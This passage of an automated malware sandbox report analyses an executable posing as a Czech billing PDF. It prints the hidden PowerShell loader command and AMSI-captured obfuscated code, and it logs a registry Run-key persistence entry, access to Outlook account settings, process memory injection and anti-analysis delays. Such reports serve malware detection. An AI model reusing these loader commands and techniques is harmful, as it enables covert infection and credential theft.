            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeUnpacked PE file: 28.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeUnpacked PE file: 29.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeUnpacked PE file: 30.2.Nubilum.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara matchFile source: 00000002.00000002.1663936772.0000000008EC4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3672277359.0000000001BE4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Brevaabnerens $Duvning $Affixion), (Thimblewit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Leveringsdato = [AppDomain]::CurrentDomain.GetAssemblies()$g
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Furler)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Framboise, $false).DefineType($Occupations, $Vandl
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,28_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048A1C3B push eax; iretd 2_2_048A1C49
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048A1C4B push eax; iretd 2_2_048A1C49
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_075070A5 push 8B059A24h; iretd 2_2_075070AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0750FA02 push es; ret 2_2_0750FA0F
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2806 push ecx; ret 16_2_1FAB2819
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044693D push ecx; ret 28_2_0044694D
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044DB70 push eax; ret 28_2_0044DB84
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0044DB70 push eax; ret 28_2_0044DBAC
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00451D54 push eax; ret 28_2_00451D61
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044B090 push eax; ret 29_2_0044B0A4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_0044B090 push eax; ret 29_2_0044B0CC
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00451D34 push eax; ret 29_2_00451D41
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00444E71 push ecx; ret 29_2_00444E81
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00414060 push eax; ret 30_2_00414074
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00414060 push eax; ret 30_2_0041409C
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00414039 push ecx; ret 30_2_00414049
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_004164EB push 0000006Ah; retf 30_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00416553 push 0000006Ah; retf 30_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00416555 push 0000006Ah; retf 30_2_004165C4

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Nubilum.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run husmndenesJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run husmndenesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,29_2_004047CB
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeAPI/Special instruction interceptor: Address: 2235C58
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,28_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6261Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3550Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeWindow / User API: threadDelayed 3425Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeWindow / User API: threadDelayed 5535Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeWindow / User API: foregroundWindowGot 1760Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeAPI coverage: 8.4 %
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeAPI coverage: 9.9 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1416Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7896Thread sleep count: 3425 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7916Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7920Thread sleep count: 5535 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exe TID: 7920Thread sleep time: -16605000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 8164Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeThread sleep count: Count: 3425 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_00406404 FindFirstFileW,FindClose,0_2_00406404
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004058B2
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_1FAB10F1
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB6580 FindFirstFileExA,16_2_1FAB6580
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040AE51 FindFirstFileW,FindNextFileW,28_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00418981 memset,GetSystemInfo,28_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Temp\cpykjjxvcoutmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohruxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
            Source: Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
            Source: Nubilum.exe, 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3273929977.000002CE9202B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3274897690.000002CE97654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3273898408.000002CE92013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Nubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW p
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-1283
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-1495
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeAPI call chain: ExitProcess graph end nodegraph_29-34113
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_044ED6E0 LdrInitializeThunk,2_2_044ED6E0
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_1FAB2639
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,28_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,28_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB4AB4 mov eax, dword ptr fs:[00000030h]16_2_1FAB4AB4
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB724E GetProcessHeap,16_2_1FAB724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_1FAB2B1C
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_1FAB2639
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_1FAB60E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Nubilum.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Nubilum.exe base: 1AA0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Nubilum.exe base: 19FFF4Jump to behavior
